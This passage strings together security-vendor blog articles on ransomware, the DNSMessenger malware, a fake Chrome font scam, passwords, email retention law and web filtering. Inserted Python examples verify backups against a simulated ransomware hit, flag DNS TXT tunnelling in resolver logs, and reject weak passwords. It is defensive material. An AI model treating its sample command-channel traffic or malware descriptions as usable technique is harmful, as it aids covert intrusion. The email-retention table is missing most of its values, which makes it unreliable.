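        elif p.stat().st_size != meta["size"] or sha256_file(p) != meta["sha256"]:
            problems.append(f"corrupt: {rel}")
    for rel in sorted(set(present) - set(expected)):
        problems.append(f"unexpected: {rel}")  # e.g. .locked/.encrypted files dropped by ransomware
    return problems


def demo():
    """Build a small backup set, verify it, then simulate a ransomware hit on the backup volume."""
    tmp = Path(tempfile.mkdtemp(prefix="backup-demo-"))
    try:
        (tmp / "ehr").mkdir()
        victim = tmp / "ehr" / "patients.db"
        victim.write_bytes(b"constructed sample record\n" * 1000)
        (tmp / "config.yaml").write_text("constructed: true\n")
        write_manifest(tmp)
        clean = verify_backup(tmp)

        victim.write_bytes(b"\x00" * 64)  # contents overwritten in place
        corrupt = verify_backup(tmp)

        victim.rename(victim.parent / (victim.name + ".locked"))  # typical renamed-encrypted file
        tampered = verify_backup(tmp)
        return clean, corrupt, tampered
    finally:
        shutil.rmtree(tmp, ignore_errors=True)


if __name__ == "__main__":
    for label, problems in zip(("clean", "corrupt", "tampered"), demo()):
        print(f"{label}: {problems or 'OK'}")
```

Keep a copy of the manifest somewhere the backup volume cannot reach (an offline copy or a separate write-once location, passed via `manifest_path`); otherwise ransomware that encrypts the backup can destroy the evidence along with the data, and the verification will happily report a manifest that was rewritten by the attacker.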
At the conference, there were many security professionals offering ransomware advice for healthcare providers, although when it comes to prevention there is no silver bullet. A range of ransomware defenses should be deployed to prevent email and web-borne attacks.
Cybersecurity solutions should be implemented to prevent malicious emails from being delivered to end users. Spam filtering solutions are one of the best defenses against email-borne threats as they block the majority of malicious emails from being delivered to end users. Cybersecurity solutions should also be implemented to prevent web-borne attacks. Web filters block malicious websites from being visited and can be configured to prevent downloads of malicious and suspicious files. Endpoint security solutions should also be considered. They can rapidly detect downloads of malicious files and prevent malicious software from being installed.
Employees must also be informed of the risk of attack and trained to be more cyber aware. Training should be reinforced with exercises to test whether cybersecurity training has been effective. Individuals can then be singled out and provided with further training as necessary.
Comey explained to attendees at the Boston Conference on Cybersecurity that the key to combating cybercrime is collaboration. Cybercrime has escalated in recent years and the problem is not going to be beaten by organizations acting independently. Collaboration between law enforcement organizations and companies across all industries is essential. Comey said all new cyberthreats and details of cyberattacks should be shared with the FBI.
A new fileless malware has been detected that uses DNS to receive commands and send information to the attackers’ command and control server. The stealthy communication method together with the lack of files written to the hard drive makes this new malware threat almost impossible to spot.
The attack method, termed DNSMessenger, starts with a phishing email, as is the case with many of the new malware threats now being detected. The host is infected via a malicious Word document.
Opening the Word document displays a message claiming the document has been protected using McAfee Secure and that the user must enable content to view it. Doing so runs a VBA macro that defines and launches the PowerShell command containing the malicious code. As with other fileless malware, no files are written to the hard drive during the infection process, which makes the threat difficult to detect.
Fileless malware is nothing new; in fact it is becoming increasingly common. What makes this threat unusual is its method of communication. The malware receives commands via DNS, a protocol normally used to look up the IP addresses associated with domain names, sending and receiving information through DNS TXT queries and responses.
DNS TXT records are legitimately used by the controls organizations have in place to identify phishing emails and verify the sender of a message, Sender Policy Framework (SPF) and Domain-based Message Authentication, Reporting and Conformance (DMARC), so TXT lookups are expected traffic on most networks.
The attackers send commands to the malware in DNS TXT responses and the malware returns the output of those commands through the same channel. Even where an organization blocks outbound DNS to unapproved servers, the malware’s queries are simply forwarded by the organization’s own recursive resolver, so it can still reach the attackers’ C2 infrastructure.
While many organizations inspect the contents of web traffic, relatively few inspect the content of DNS requests. The malware is therefore likely to operate unnoticed. Further, the Cisco Talos team that detected the malware reports that only 6/54 AV engines detected the threat, although ClamAV did identify the file as malicious.
Cybercriminals constantly look for new methods of bypassing security controls and infecting end users. Since this threat arrives by email, that is the point at which it is easiest to block. Infection also requires macros to be enabled; if macros are blocked, the malicious VBA never runs. Finally, because the malware’s DNS traffic differs from ordinary name resolution, most obviously in the volume of TXT queries it generates, inspecting DNS content and query patterns should allow security teams to identify infected hosts.
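Since so few organizations inspect DNS content, even a simple first pass over resolver query logs is worth having. The Python below is an added example, not Cisco Talos tooling and not a signature for DNSMessenger itself: it reads BIND-style query-log lines, discards the TXT lookups that SPF, DMARC, DKIM and ACME legitimately generate, and then flags any client that sends many TXT queries for many distinct, high-entropy names under a single domain. The log format, thresholds, allow-list and sample lines are assumptions constructed for the example.

```python
"""Flag hosts that look like they are tunnelling data over DNS TXT queries.

Added example: not Cisco Talos tooling and not a signature for DNSMessenger itself. It assumes a
BIND-style query log; the thresholds, the allow-list of expected TXT lookups and the sample log
lines are constructed for the illustration.
"""
import math
import re
from collections import defaultdict

# BIND query-log line: "client 10.0.0.7#40321: query: foo.example.com IN TXT + (10.0.0.2)"
LOG_RE = re.compile(r"client (?P<client>[\d.]+)#\d+: query: (?P<qname>\S+) IN (?P<qtype>[A-Z]+)")

# TXT lookups that normal mail and certificate plumbing generate (DMARC, ACME; DKIM and SPF below).
EXPECTED_TXT_PREFIXES = ("_dmarc.", "_acme-challenge.")


def shannon_entropy(s: str) -> float:
    """Bits per character; random-looking labels score high, dictionary words low."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def base_domain(qname: str) -> str:
    """Registrable domain approximated as the last two labels (no public-suffix list here)."""
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[-2:])


def is_expected_txt(qname: str) -> bool:
    """True for the TXT lookups SPF, DMARC, DKIM and ACME produce on a healthy network."""
    q = qname.rstrip(".").lower()
    if q.startswith(EXPECTED_TXT_PREFIXES) or "._domainkey." in q:
        return True
    return q == base_domain(q)  # SPF record lives at the apex


def detect_txt_tunnels(log_lines, min_queries=5, min_unique=5, min_entropy=3.0):
    """Group non-expected TXT queries per (client, base domain) and score volume, churn and entropy."""
    stats = defaultdict(lambda: {"queries": 0, "names": set(), "entropy_sum": 0.0})
    for line in log_lines:
        m = LOG_RE.search(line)
        if not m or m["qtype"] != "TXT" or is_expected_txt(m["qname"]):
            continue
        key = (m["client"], base_domain(m["qname"]))
        s = stats[key]
        s["queries"] += 1
        s["names"].add(m["qname"])
        s["entropy_sum"] += shannon_entropy(m["qname"].split(".")[0])  # leftmost label carries payload
    alerts = []
    for (client, domain), s in stats.items():
        mean_entropy = s["entropy_sum"] / s["queries"]
        if s["queries"] >= min_queries and len(s["names"]) >= min_unique and mean_entropy >= min_entropy:
            alerts.append({"client": client, "domain": domain, "txt_queries": s["queries"],
                           "unique_names": len(s["names"]), "mean_entropy": round(mean_entropy, 2)})
    return alerts


# Constructed sample log. 10.0.0.5 does ordinary mail-auth lookups; 10.0.0.9 sends two odd TXT
# queries (below threshold); 10.0.0.7 sends six TXT queries for six different high-entropy labels
# under one domain, the pattern a DNS command channel produces.
_ALPHABET = "abcdefghijklmnopqrstuvwxyz234567"
SAMPLE_LOG = [
    "client 10.0.0.5#51234: query: www.example.com IN A + (10.0.0.2)",
    "client 10.0.0.5#51235: query: example.com IN TXT + (10.0.0.2)",
    "client 10.0.0.5#51236: query: _dmarc.example.org IN TXT + (10.0.0.2)",
    "client 10.0.0.5#51237: query: selector1._domainkey.example.net IN TXT + (10.0.0.2)",
    "client 10.0.0.9#40001: query: ab12cd.c2-example.net IN TXT + (10.0.0.2)",
    "client 10.0.0.9#40002: query: ef34gh.c2-example.net IN TXT + (10.0.0.2)",
] + [
    f"client 10.0.0.7#4032{i}: query: {_ALPHABET[i:] + _ALPHABET[:i]}.c2-example.net IN TXT + (10.0.0.2)"
    for i in range(6)
]

if __name__ == "__main__":
    for alert in detect_txt_tunnels(SAMPLE_LOG):
        print(alert)
```

Tune `min_queries` and `min_entropy` against a week of your own logs first. Base32-style labels score close to 5 bits per character while ordinary hostnames sit nearer 3, so the default threshold separates them, but a slow channel that spaces its queries out needs a longer aggregation window than a single log file.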
Opposition to pornography filtering in libraries has seen the American Library Association placed on the National Center for Sexual Exploitation (NCOSE) naughty list.
Each year, NCOSE publishes a list of the top twelve companies and organizations that it believes are either profiting from pornography or facilitating access. The aim of the list, referred to as the Dirty Dozen, is to name and shame the companies and organizations that are failing to do enough to tackle the growing problem of online pornography.
Pornography is only the tip of the iceberg. Hidden underneath is a world of sexual exploitation, prostitution, and sex trafficking. NCOSE sees companies and organizations that fail to take action as being part of the problem, inadvertently – or in some cases deliberately – contributing to the considerable harm that is caused by pornography.
This year’s list includes technology and telecoms companies (Amazon, Comcast, Roku), the American Library Association (ALA), and EBSCO (a provider of library resources to schools, colleges, higher education establishments and libraries). Four websites make the list (YouTube, Twitter, Snapchat, and Backpage.com), along with Cosmopolitan Magazine, HBO, and Amnesty International.
The ALA is almost a permanent fixture on the NCOSE Dirty Dozen list, having been present for the past five years. It is the ALA’s opposition to the use of pornography filtering in libraries that sees it included year after year. NCOSE says “the ALA zealously encourages public libraries not to install internet filters on public access computers.” By taking such a stance, the ALA is providing patrons – including children – with the means to access sexually explicit and obscene material. ALA told CBN news that “Librarians encourage parents and children to talk with one another. Families have a right to set their own boundaries and values. They do not have the right to impose them on others.”
NCOSE doesn’t hold back, saying the ALA stance on pornography filtering in libraries “has turned the once safe community setting of the public library into a XXX space that fosters child sexual abuse, sexual assault, exhibitionism, stalking, and lewd behavior in libraries across the country.”
Only this month, NCOSE responded to the ALA’s continued opposition to pornography filtering in libraries on the grounds of free speech, saying there is no constitutional requirement for libraries to provide access to hardcore pornography to patrons.
EBSCO made the list as its databases “provide easy access to hardcore pornography sites and extremely graphic sexual content,” pointing out that its system allows schoolchildren to easily circumvent web filters in schools. In response to its inclusion on the list, EBSCO says it is working on enhancing its web filtering systems and will implement better algorithms to filter pornographic content.
Amazon made the list, even though it has a policy prohibiting the sale of pornography, because of its pornography-related items on its site, including hardcore pornographic films and sex dolls with childlike features.
Amnesty International made the list for its stance on the decriminalization of prostitution and for creating “a de facto right for men to buy people.” Cosmopolitan was included for its hypersexualized imagery and glamorization of violent, public, and group sex. Roku, Comcast, Snapchat, Twitter, YouTube and HBO were included for peddling pornography, pushing the boundaries of what is acceptable, and making it too easy for pornographic content to be accessed.
A security researcher has discovered a new Google Chrome scam that infects victims’ computers with malware. In contrast to many malware-downloading scams, this one is highly convincing and is likely to result in many malware infections.
A popup appears on screen informing the visitor that “the “HoeflerText” font wasn’t found” by Google Chrome. The visitor is told that the webpage they are trying to view cannot be displayed correctly as a result. Visitors are prompted to update their Chrome browser to include the new font by downloading a “Chrome Font Pack.”
The Google Chrome scam is convincing. The popup uses the Chrome logo and looks official, with colors and branding that Google would use on its popup windows. The shading used for the “Update” button on the popup window is also accurately reproduced.
Furthermore, HoeflerText is a real font. If the user opens a new tab and searches for the font, they will find that it exists, making the scam seem entirely plausible.
Clicking the update button will trigger a download of the update file – ChromeFontv7.5.1.exe – which is an executable containing the malware. While attempting to run the executable would normally result in an anti-virus warning being displayed, relatively few anti-virus products are detecting the ChromeFontv7.5.1.exe file as malicious. VirusTotal shows that just 9 out of 59 AV products identify the file as malicious.
The Google Chrome scam was uncovered by NeoSmart Technologies researcher Mahmoud Al-Qudsi. He reports that while the scam is highly convincing, there are two signs that the update is not real. First, regardless of the version of Chrome in use, the popup says the user has Chrome version 53. Second, the popup says the update file is called Chrome_Font.exe, yet the file that is actually downloaded has a different name. These two slip-ups by the criminals behind the campaign are slight and are unlikely to be noticed by many users.
WebTitan Protects Users from the Latest Google Chrome Scam
The malware is identified as malicious by ClamAV and Kaspersky Lab, the dual anti-virus engines used by WebTitan to protect users from malware infections while browsing the Internet. If WebTitan is installed, this and other malware threats are blocked, preventing end users from inadvertently infecting their computer with malware.
If you have yet to implement a web filtering solution, your computers and networks are likely to be at risk of being infected. Malware and ransomware infections are costly to resolve, cause considerable disruption to business processes, and can result in the theft of intellectual property, customer data, and login credentials. The latter can be used to gain access to corporate bank accounts, allowing funds to be transferred to criminals’ accounts.
Since visiting malicious websites can result in malware being silently downloaded without any user interaction, employees may be unaware that their computers have been infected. Malware infections may go undetected for long periods of time, during which large volumes of sensitive data can be stolen.
A web filtering solution will prevent employees from visiting malicious websites that phish for sensitive information or download malware. Furthermore, a web filtering solution is inexpensive to implement and maintain.
To discover the benefits of web filtering and to find out more about WebTitan, contact the TitanHQ team today. WebTitan is also available on a 30-day, no obligation free trial allowing you to discover the benefits of the full product before deciding to proceed with a purchase.
Email retention laws in the United States require businesses to keep copies of emails for many years. There are federal laws applying to all businesses and organizations, data retention laws for specific industries, and a swathe of email retention laws in the United States at the individual state level. Ensuring compliance with all the appropriate email retention laws in the United States is essential. Non-compliance can prove incredibly costly. Multi-million-dollar fines await any organization found to have breached federal, industry, or state regulations.
Electronic documents must be retained by U.S. organizations, and that requirement extends to email, in case the information is required by the courts. eDiscovery requests often require large volumes of data to be produced for use in lawsuits, and failure to provide the data can land an organization in serious trouble. Not only are heavy fines issued, organizations can face criminal proceedings if certain data are deleted.
For decades, U.S. organizations have been required to store documents. Document retention requirements are included in numerous legislative acts such as the Civil Rights Act of 1964, Executive Order 11246 of 1965, the Freedom of Information Act of 1967, the Occupational Safety and Health Act of 1970, and the Immigration Reform and Control Act of 1986, to name but a few. Just over a decade ago, data retention rules in the United States were updated to expand the definition of documents to include electronic communications such as emails and email attachments.
To improve awareness of the many different email retention laws in the United States, a summary has been detailed below. Please bear in mind that this is for information purposes only and does not constitute legal advice. For legal advice on data retention laws in the United States, we recommend you consult your legal representatives. Industry and federal electronic data and email retention laws in the United States are also subject to change. Up to date information should be obtained from your legal team.
What are the Different Email Retention Laws in the United States?
As you can see from the list below, there are several federal and industry-specific email retention laws in the United States. These laws apply to emails received and sent, and include internal as well as external emails.
| Email retention law | Who it applies to | How long emails must be stored |
|---|---|---|
| Freedom of Information Act (FOIA) | Federal, state, and local agencies | |
| Sarbanes Oxley Act (SOX) | All public companies | |
| Department of Defense (DOD) Regulations | | |
| Federal Communications Commission (FCC) Regulations | | |
| Federal Deposit Insurance Corporation (FDIC) Regulations | Banks and Financial Institutions | |
| Food and Drug Administration (FDA) Regulations | Pharmaceutical firms, food manufacturers, food storage and distribution firms, manufacturers of biological products | Minimum of 5 years rising to 35 years |
| Health Insurance Portability and Accountability Act (HIPAA) | Healthcare organizations (healthcare providers, health insurers, healthcare clearinghouses and business associates of covered entities) | |
| Payment Card Industry Data Security Standard (PCI DSS) | Credit card companies and credit card processing organizations | |
| Securities and Exchange Commission (SEC) Regulations | Investment banks, investment advisors, brokers, dealers, insurance agents & securities firms | Minimum of 7 years up to a lifetime |
Email retention laws in the United States that are applied by each of the 50 states are beyond the scope of this article. There are also European laws, such as the GDPR email requirements.
What is the Best Way to Store Old Emails?
Storing emails for a few years is not likely to require masses of storage for a small business with a couple of members of staff. However, the more employees an organization has, the greater the need for extensive resources just to store emails. The average size of a business email may only be 10KB, but multiply that by 123 – the average number of emails sent and received each day by an average business user in 2016 (Radicati email statistics report 2015-2019), and by 365 days in each year, and by the number of years that those emails need to be stored, and the storage requirements become considerable.
If any emails ever need to be accessed, it is essential that any email archive or backup can be searched. In the case of standard backups, that is likely to be an incredibly time-consuming process. Backups are not designed to be searched. Finding the right backup alone can be almost impossible, let alone finding all emails sent to, or received from, a specific company or individual. Backups have their uses, but they are not suitable for email retention purposes.
For that, an email archive is required. Email archives contain structured email data that can easily be searched. If ever an eDiscovery order is received, finding all email correspondence is a quick and easy task. Since many email archives are cloud based, they also do not require huge storage resources. Emails are stored in the cloud, with the space provided by the service provider.
ArcTitan: TitanHQ’s Cost Effective and Convenient Email Archiving Solution
ArcTitan is a cost-effective, fast and easy-to-manage email archiving solution provided by TitanHQ that meets the needs of all businesses and enables them to comply with all email retention laws in the United States.
ArcTitan incorporates a range of security protections to ensure stored data is kept 100% secure and confidential, with email data encrypted in transit and storage. In contrast to many email archiving solutions, ArcTitan is fast. The solution can process 200 emails per second from your email server and archived emails can be retrieved instantly via a browser or Outlook (using a plugin). Emails can be archived from any location, whether in the office or on the go via a laptop or tablet. There are no limits on storage space or the number of users. The solution can be scaled up to meet the needs of businesses of all sizes.
To find out more about ArcTitan and how it can benefit your business, contact the TitanHQ team today and kiss goodbye to all your email storage headaches.
The hacking of WiFi networks can be highly lucrative for cybercriminals. If WiFi passwords are obtained by hackers, malware can be installed and every user who connects to that network faces a higher risk of having their device and sensitive information stolen.
Strong passwords should be set on Wi-Fi networks to make it harder for cybercriminals to guess them. However, an ISP in the United States recently encouraged its customers to make their Wi-Fi passwords less secure, suggesting they change them to show support for their Super Bowl team.
Charter Spectrum – the second largest ISP in the United States – sent the following tweet to its customers on January 23, 2017 – “Change your WiFi password and show guests where your loyalty lies! #ThatsMyTeam”.
With the Super Bowl fast approaching, the idea was for businesses to show their support for either the New England Patriots or the Atlanta Falcons. By changing their Wi-Fi passwords to GO_ATLANTA or GO_NEWENGLAND they would be telling their customers that they fully supported their local team. It is clear what the intention of the ISP was, although suggesting an easy password for a Wi-Fi network and then tweeting it to customers and followers of the #ThatsMyTeam hashtag was a monumentally bad idea.
It is possible that the ISP was trying to suggest that businesses change the name of their WiFi network temporarily. That would not pose any cybersecurity risk, although that is not what the tweet said. The ISP was widely criticized for the tweet on social media sites and the tweet has since been deleted.
Making a WiFi password less secure makes it easier for hackers to conduct man-in-the-middle attacks. In these attacks an attacker intercepts and alters communications between two parties, in this case a person who connects to the WiFi network and the website they wish to communicate with, such as their bank or an online store. Email conversations can also be hijacked and communications intercepted. Hackers can eavesdrop on conversations and gather information that can be used in future spear phishing campaigns, or obtain highly sensitive login credentials for work networks or secure accounts.
We advise always setting a strong, secure password on Wi-Fi networks and changing that password regularly to prevent cybercriminals from taking advantage. As an additional cybersecurity protection for Wi-Fi network users, a web filter should be used.
By installing WebTitan on your WiFi network, it is possible to control the websites that customers can access. Websites containing exploit kits that silently download malware onto users’ devices can be blocked. A web filter can also be used to prevent users from visiting inappropriate websites that could cause offense to other patrons or harm to minors – pornographic websites for instance. By exercising just a little control over accessible content, a WiFi network can be made safe and secure for all users.
Following a massive increase in ransomware attacks, security experts have called for ransomware protection for universities to be augmented.
Ransomware: A Major Threat to Universities the World Over
Ransomware has become one of the biggest data security threats. The healthcare industry has been extensively targeted, as have the financial services, manufacturing, telecoms, and just about every other industry sector. Now, attacks are being conducted on higher education establishments with increased vigor.
Universities are attractive targets. They store vast quantities of data. Researchers, teaching staff, and students alike need access to data on a daily basis. Without access, all work grinds to a halt. That means ransom demands are likely to be paid.
Secondly, universities use thousands of computers and have tens of thousands of users. Cybersecurity defenses may be good, but with so many individuals with access to Internet-facing computers, protecting against targeted attacks on those individuals is a major challenge. Staff and students are being actively targeted as they are the weak links in the security chain.
Then there is the issue of academic freedom. While many industries have implemented web filtering solutions to limit the websites that can be visited by staff and students, many universities have been reluctant to restrict Internet access.
In a similar vein, university networks tend to be more open than those in the business world. Businesses tend to severely restrict network access, so if an attack occurs the damage is very limited. Open networks tend to result in huge numbers of files and devices being encrypted if an attacker breaks through the security perimeter.
Ransomware Protection for Universities Clearly Lacking
The number of university ransomware attacks that have been reported by institutions in the United States and Canada in 2016 has reached alarming levels. Many of those universities have been forced to pay the ransom demands to restore access to files.
Last year, the University of Calgary was forced to pay $16,000 to restore access after a ransomware attack. Carleton University was also attacked with ransomware, as was Los Angeles Valley College. According to a Newsweek report in August last year, two thirds of British universities had been attacked with ransomware. Queen’s University in Belfast, Northern Ireland, was one of those attacked. A ransom had to be paid to recover data. One university in the United Kingdom – Bournemouth University – experienced 21 ransomware attacks in the space of 12 months. The list goes on and on.
Malware is also a problem. The University of Alberta discovered a malware infection on 304 computers. A keylogger had been installed which recorded details of all information entered on infected computers, including login details.
It is unsurprising given the extent to which universities are being attacked that there have been numerous calls for ransomware protection for universities to be improved. But how can ransomware protection for universities actually be improved without causing major disruption to staff and students or overly restricting data access?
How Can Ransomware Protection for Universities be Improved?
Universities, like all organizations, must develop a strategy to prevent ransomware attacks and deal with them when they occur. Protections need to be improved to prevent attacks, technology needs to be employed to detect ransomware infections quickly, and policies and procedures must be developed so rapid action can be taken when attacks occur. Rapid action can greatly reduce the harm caused.
No university wants to overly restrict Internet access, but the use of a web filter is strongly recommended. Rather than blocking access to valuable information, an advanced web filtering solution such as WebTitan can be applied to restrict access to malicious websites and to block malware downloads. WebTitan has highly granular controls which allow restrictions to be put in place to prevent ransomware infections, without overblocking website content. Furthermore, Internet access controls can be easily set for different user groups.
At the very least, universities should apply web filtering controls to prevent the accessing of websites that are known to contain malware and should not rely on their anti-virus solution to provide this service.
It is also essential for controls to be applied to the email system to block emails containing malicious links and attachments. SpamTitan blocks 99.97% of spam emails and 100% of known malware using two anti-virus engines for extra protection. SpamTitan not only blocks incoming spam, but also performs scans of outgoing mail to prevent the spread of infections between end users.
Antivirus and anti-malware solutions should also be used and updated automatically. Intrusion detection systems should also be considered to ensure that infections are rapidly identified.
Good patch management policies are also essential to ensure vulnerabilities are not allowed to persist. Applying patches and software updates promptly reduces the risk of vulnerabilities being exploited.
Even with technologies in place, staff and students should be educated about the risk of cyberattacks, phishing, malware and ransomware. Best practices should be distributed via email to all staff and students along with information about any specific cyberthreats.
Unfortunately, unless ransomware protection for universities is greatly improved, the attacks are likely to continue. Cybercriminals view higher education institutions as soft and potentially highly lucrative targets. It is up to universities to take appropriate action to prevent malware and ransomware attacks.
Poor cybersecurity practices exist at many US organizations, which are allowing hackers and other cybercriminals to gain access to corporate networks, steal data, and install malware and ransomware. Businesses can implement highly sophisticated cybersecurity defenses, but even multi-million-dollar cybersecurity protections can be easily bypassed if poor cybersecurity practices persist.
This month we have seen two reports issued that have highlighted one of the biggest flaws in the cybersecurity defenses of US enterprises: poor password hygiene.
The purpose of passwords is to prevent unauthorized access to sensitive data, yet time and again we have seen data breaches occur because of end users’ poor choice of passwords and bad password practices.
Earlier this month, SplashData released its annual report on the worst passwords of 2016. The report details the top 25 poorly chosen passwords. This year’s report showed that little had changed year on year. Americans are still very bad at choosing strong passwords.
Top of this year’s list of the worst passwords of 2016 were two absolute howlers: 123456 and password. Number three and four were no better – 12345 and 12345678. Even number 25 on the list – password1 – would likely only delay a hacker by a few seconds.
Another study also highlighted the extent to which Americans practice poor password hygiene. Pew Research asked 1,040 US adults about their password practices. 39% of respondents said they used the same passwords – or very similar passwords – for multiple online accounts, while 25% admitted to using very simple passwords because they were easier to remember. 56% of 18-29-year-old respondents said that they shared their passwords with other individuals, while 41% of all respondents said they shared passwords with family members.
The results of this survey were supported by later research conducted by TeleSign, who found a very blasé attitude to online security among U.S. citizens. Although 80% of respondents admitted to being concerned about online security (and half of those claimed to have had an online account hacked in the past year), 73% of respondents’ online accounts are guarded by duplicate passwords and 54% of respondents use five or fewer passwords across their entire online life.
While the Pew Research and TeleSign surveys did not specifically apply to businesses, these poor password practices are regrettably all too common. Passwords used for corporate accounts are recycled and used for personal accounts, and poor password choices for company email accounts and even network access are common. Although two-factor authentication is not a solution to the problem of poor personal cybersecurity practices, only 38% of U.S. companies use it to protect their networks from poor corporate cybersecurity practices.
Poor Cybersecurity Practices That Leave Organizations Open to Cyberattacks
Unfortunately, poor cybersecurity practices persist in many organizations. IT departments concentrate on implementing sophisticated multi-layered defenses to protect their networks and data from hackers, yet are guilty of failing to address some of the most basic cybersecurity protections.
The failure to address the following poor cybersecurity practices at your organization will leave the door wide open, and hackers are likely to be quick to take advantage.
More than 4,100 data breaches of more than 500 records were reported by organizations in the United States in 2016*. Many of those data breaches could have been avoided if organizations had eradicated their poor cybersecurity practices.
Some of the main cybersecurity mistakes made by US companies include:
- Not conducting a comprehensive, organization-wide risk assessment at least every 12 months
- The failure to enforce the use of strong passwords
- Not providing employees with a password manager to help them remember complex passwords
- The continued use of unsupported operating systems such as Windows XP
- Failure to apply patches and updates promptly
- Not restricting the use of administrator accounts
- Failure to adequately monitor devices for shadow IT
- Failure to block macros from running automatically
- Giving employees unnecessary access to data systems and networks
- Not providing employees with cybersecurity awareness training
- Not instructing employees on the safe handling of personally identifiable information
- Failure to conduct anti-phishing simulation exercises
- Failure to notify new employees and vendors of IT security policies and procedures before data access is provided
- Not revising and updating IT security policies and procedures at least every six months
- Failure to change default logins on networked devices
- Failure to encrypt data on portable storage devices
- Allowing employees full, unfettered access to the Internet
- Failure to implement a spam filter to block malicious email messages
- Failure to monitor applications with access to data
- Failure to create appropriate access controls
- Failure to monitor the activity of employees
*2016 Data Breach Report from Risk Based Security
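The worst-password list above and the "failure to enforce the use of strong passwords" item both call for a check at password-set time. The following is an added example, not code from the article or from TitanHQ: the denylist is constructed from the five SplashData entries quoted above (a real deployment would load the full published list), and the normalisation rules, the 12-character minimum and the function names are assumptions of this example, not requirements the article states.

```python
"""Reject the worst-password choices the article describes, including
trivial variants (Password2016!, P@ssw0rd!) and cosmetic password changes."""
import re

# Constructed from the five entries the article quotes; load the full list in practice.
WORST_PASSWORDS = {"123456", "password", "12345", "12345678", "password1"}
MIN_LENGTH = 12  # assumption of this example, not a figure from the article

# Common character substitutions users apply to slip past a naive denylist.
LEET = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a", "5": "s", "@": "a", "$": "s"})
_TRAILING_JUNK = re.compile(r"[\d\W_]+$")  # trailing digits, punctuation, underscores


def password_variants(pw):
    """Return every form under which a password is compared against the denylist:
    lower-cased, with trailing digits/punctuation stripped (Password2016! -> password),
    and with common leetspeak undone (P@ssw0rd -> password)."""
    low = pw.lower()
    stripped = _TRAILING_JUNK.sub("", low)
    forms = {low, stripped, low.translate(LEET), stripped.translate(LEET)}
    return {f for f in forms if f}  # drop the empty string left by all-digit inputs


# Precompute the variants of every denylisted entry once.
DENYLIST_FORMS = set().union(*(password_variants(p) for p in WORST_PASSWORDS))


def check_password(pw, denylist_forms=DENYLIST_FORMS):
    """Return the reasons a password is rejected; an empty list means it passes."""
    reasons = []
    if len(pw) < MIN_LENGTH:
        reasons.append("too_short")
    if password_variants(pw) & denylist_forms:
        reasons.append("denylisted")
    return reasons


def is_trivial_variant_of(new_pw, old_pw):
    """True when the new password is only a cosmetic change of the old one
    (Summer2016 -> Summer2017!), the reuse habit the Pew survey describes.
    Intended for the password-change flow, where the user has just supplied the old one."""
    return bool(password_variants(new_pw) & password_variants(old_pw))


if __name__ == "__main__":
    for candidate in ["123456", "P@ssw0rd!", "Password2016!", "correct horse battery staple"]:
        verdict = check_password(candidate)
        print(f"{candidate!r:32} -> {'OK' if not verdict else ', '.join(verdict)}")
    print("Summer2016 -> Summer2017! is a trivial variant:",
          is_trivial_variant_of("Summer2017!", "Summer2016"))
```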
Internet filtering laws in the UK could soon be updated to allow Internet Service Providers (ISPs) to legally block explicit website content.
Former UK Prime Minister David Cameron announced in 2013 that his – and his party’s – aim was to implement greater controls over the Internet and to start blocking pornography by default. In the summer of 2013, pornography filters were put in place by most Internet Service Providers in the UK. Major ISPs in the UK now require customers to opt in if they want to use their computers to view online pornography. Unless requested, pornography filters are applied.
However, last year, as part of a new EU ruling covering mobile phone roaming charges, the porn filter in the UK was determined to be illegal. The EU ruled that companies are not permitted to block access to legal website content, only website content that is illegal in member states.
The UK opted out of the law after it was passed last year, allowing ISPs to continue to block Internet porn without violating the EU’s ‘Net Neutrality’ laws. However, even though the UK voted out, ISPs were only ever requested to implement porn filters. Internet filtering laws in the UK have never been introduced.
The Digital Economy Bill – which has already been passed by the House of Commons – has had a number of amendments added this week, one of which covers the use of Internet filters. If the Bill is written into law, this will be the first legislation in the UK covering the use of Internet filters.
The new clause is as follows: “A provider of an internet access service to an end-user may prevent or restrict access on the service to information, content, applications or services, for child protection or other purposes, if the action is in accordance with the terms on which the end-user uses the service.”
The UK’s House of Lords will now subject the bill, and the proposed amendments, to close scrutiny next week, examining the Bill line by line. While it is possible that some of the controversial elements of the Bill will be dropped, it is now looking likely that Internet filtering laws in the UK will be introduced.
The Bill also requires ISPs in the UK to block websites containing pornography that do not have any age verification mechanism in place. According to Department of Media, Culture, and Sport parliamentary under-secretary of state Lord Ashton, ISPs will be required to block these websites, with the legislation enforced by the British Board of Film Classification.
While the UK has voted to leave the EU following the ‘Brexit’ vote, until the UK actually leaves the European Union it is required to comply with EU laws. Currently there is some confusion over whether the blocking of pornography by default in the UK contravenes EU laws.
While there is some doubt over the matter, the UK’s communications regulator – OFCOM – has not instructed ISPs to lift the block and require customers to opt in if they want to restrict access to pornography.
A spokesperson for the Department of Media, Culture, and Sport said “We are committed to keeping children safe from harmful pornographic content on the internet and this amendment will give internet service providers reassurance the family friendly filters they currently offer are compliant with EU law.”
There is an important reason why the use of web filters in libraries is increasing. The cost of providing computers with Internet access to patrons is not inconsiderable, yet in order to qualify for discounts under the E-Rate program, libraries must implement a web filter to comply with CIPA regulations. Libraries must use the web filter to block obscene images (pornography), images of child abuse, and any other graphics that could cause minors to come to harm.
However, there is another reason why the use of web filters in libraries is important. This has been clearly demonstrated this week in St. Louis, MO.
Web Filters in Libraries are Not Only About Internet Control
This week, every computer in the St. Louis Public Library System was taken out of action. Visitors were still able to visit the library and use the books, but little else. All book borrowing stopped, since it is not possible for library staff to log borrowing on the checkout system. Patrons have also been prevented from gaining access to the Internet. Even the email system has been locked and taken out of action.
What kind of computer malfunction causes the entire network of computers to stop working? The answer is ransomware.
Ransomware is malicious software that has been developed with one sole purpose: To encrypt system and data files to prevent access. Once downloaded, ransomware locks files with powerful encryption preventing files from being accessed. The attacker then sends a ransom demand offering the unique keys to decrypt files in exchange for payment.
Typically, attackers demand $500 in an anonymous currency such as Bitcoin to unlock each computer that has been attacked. In the case of the St. Louis Public Library system, the ransom demand was $35,000. All 700 of the library systems’ computers – across 16 locations – were attacked and encrypted.
Some ransomware variants also act as information stealers. Fortunately for the library, its inventory was unaffected and payment card information and other personal information of patrons were not stolen.
The St. Louis Public Library system will not be paying the extortionate ransom demand. It has instead opted for the only alternative in cases of ransomware infection: wiping its entire system and restoring files from backups. That is not a quick process. It will certainly take days, and could take weeks.
